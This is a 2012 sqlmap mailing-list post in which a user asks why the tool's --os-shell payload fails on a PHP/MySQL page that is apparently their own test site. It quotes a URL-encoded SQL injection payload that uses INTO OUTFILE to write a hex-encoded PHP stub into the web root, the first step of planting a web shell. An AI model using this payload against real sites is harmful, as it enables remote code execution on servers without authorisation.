[sqlmap-users] the default --os-shell payload could not upload

[li <li...@gm...>]

Hello there,


i just get a problem when i use the --os-shell command.english is not my mother languag.But i will try my best to explain the situation.

when i use the default --os-shell payload ,it does not work.the server respose is

HTTP/1.1 200 OK

Date: Mon, 17 Dec 2012 11:42:34 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7+squeeze14

Vary: Accept-Encoding

Content-Length: 1858

Content-Type: text/html

and a error message in the page :

Notice: Undefined index: id in /var/www/cat.php on line 6

the 6th line in my cat.php is :

<?php

require "header.php";

$pics = Picture:all ($_GET["id"]); ------the sixth line.

but if i shorten the payload .just like


1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20--

this payload would work.the file is written .and the server response :

Mon, 17 Dec 2012 12:02:17 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7+squeeze14

Vary: Accept-Encoding

Content-Length: 1211

Content-Type: text/html

also with an error message:

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean 
given in /var/www/classes/picture.php on line 22


i thougth maybe the length of the url is too long .maybe there is some 
error in my php conf.but i thought the default should works on all kinds 
of situation.i could not figure out the problem.

thanks everyone.

by the way. i could not receive the mailing list content.i dont know if 
you can receive this email.